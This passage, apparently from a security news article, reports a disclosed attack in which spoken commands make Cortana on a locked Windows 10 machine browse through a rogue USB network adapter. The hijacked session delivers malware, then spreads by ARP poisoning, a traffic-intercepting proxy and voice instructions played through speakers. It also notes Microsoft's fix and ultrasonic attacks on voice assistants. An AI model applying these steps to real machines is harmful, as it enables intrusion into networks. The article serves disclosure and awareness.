The discovery was made by Tal Be’ery and Amichai Shulman, and a successful attack demonstrated in these videos:
This attack requires the attacker to have physical access to the target computer so that he can plug a network adapter in the locked machine’s USB port. The next step is to hail Cortana and instruct it to visit a non-HTTPS site. (In Windows 10, Cortana responds by default to any voice. Making it respond to just the owner’s voice requires a short “training.”)
The network adapter intercepts the web session, which can then be modified by the attacker. A reply can then be sent to the computer telling it to visit another site, which has been booby-trapped to deliver malware to visitors.
If, for example, the first computer is made to download malware that allows it to perform ARP poisoning, it can force the other computers on the local network to send all traffic through it.
If equipped with the Newspeak proxy – a tool created by the researchers that monitors all Cortana requests and responses on every machine on a network – the attacker can, as before, intercept and redirect this traffic to send those computers to malicious pages.
And, if waiting for users to use Cortana seems like too much trouble, the attacker can force the nearby machines to start a Cortana session by simply playing instructions over the original compromised computer’s speakers. If done by night, when offices are empty, this lateral move could easily pass undetected.
What will the future bring?
The researchers shared their discovery with Microsoft, and the company responded by forcing Cortana-initiated browsing from locked machines to point to the Bing search engine, which is HTTPS-protected by default.
While this means that this particular attack is thwarted, new attacks could be discovered as Cortana still responds to other commands when the machine is locked.
User interfaces using voice commands have gained in popularity in the last few years, especially when it comes to mobile phones and smart devices: Apple has Siri, Amazon has Alexa, and Google has Google Assistant.
Instances of voice-activated smart assistants doing someone else’s bidding have become par for the course, and other researchers have already devised covert attacks taking advantage of the fact that these assistants can hear (and obey) commands in ultrasonic frequencies.